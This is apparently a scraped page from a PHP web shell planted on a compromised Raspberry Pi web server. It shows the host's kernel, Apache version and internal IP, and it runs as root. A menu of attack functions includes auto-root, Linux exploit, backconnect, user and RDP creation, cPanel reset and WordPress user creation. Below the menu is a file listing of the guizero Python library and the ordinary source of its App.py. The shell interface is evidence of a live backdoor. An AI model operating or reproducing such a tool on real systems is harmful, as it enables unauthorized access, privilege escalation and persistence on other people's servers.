Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
guizero /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
App.py
1.99
KB
-rw-r--r--
Box.py
3.11
KB
-rw-r--r--
ButtonGroup.py
10.2
KB
-rw-r--r--
CheckBox.py
4.63
KB
-rw-r--r--
Combo.py
10.54
KB
-rw-r--r--
ListBox.py
8.05
KB
-rw-r--r--
MenuBar.py
1.32
KB
-rw-r--r--
Picture.py
2.58
KB
-rw-r--r--
PushButton.py
5.2
KB
-rw-r--r--
RadioButton.py
1.7
KB
-rw-r--r--
Slider.py
2.59
KB
-rw-r--r--
Text.py
2.71
KB
-rw-r--r--
TextBox.py
3.7
KB
-rw-r--r--
Waffle.py
10.4
KB
-rw-r--r--
Window.py
1.03
KB
-rw-r--r--
__init__.py
715
B
-rw-r--r--
alerts.py
1.17
KB
-rw-r--r--
base.py
18.22
KB
-rw-r--r--
event.py
5.87
KB
-rw-r--r--
tkmixins.py
10.47
KB
-rw-r--r--
utilities.py
11.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : App.py
from tkinter import Tk, Toplevel from .base import BaseWindow from . import utilities as utils class App(BaseWindow): _main_app = None def __init__(self, title="guizero", width=500, height=500, layout="auto", bgcolor=None, bg=None, visible=True): description = "[App] object" # If this is the first app to be created, create Tk if App._main_app is None: tk = Tk() App._main_app = self else: tk = Toplevel(App._main_app.tk) utils.error_format("There should only be 1 guizero App, use Window to create multiple windows.") # bg overrides deprecated bgcolor if bgcolor is not None: bg = bgcolor utils.deprecated("App 'bgcolor' constructor argument is deprecated. Please use bg instead.") super(App, self).__init__( None, tk, description, title, width, height, layout, bg, visible) # METHODS # -------------------------------------- def display(self): """ Display the window. :return: None. """ self.tk.mainloop() def destroy(self): """ Destroy and close the App. :return: None. :note: Once destroyed an App can no longer be used. """ # if this is the main_app - set the _main_app class variable to `None`. if self == App._main_app: App._main_app = None self.tk.destroy() # DEPRECATED METHODS # ------------------------------------ # Set the title of the window def set_title(self, title): self.title = title utils.deprecated("App set_title() is deprecated. Please use the title property instead.") # Change the background colour def bgcolor(self, color): self.bg = color utils.deprecated("App bgcolor() is deprecated. Please use the bg property instead.")
Close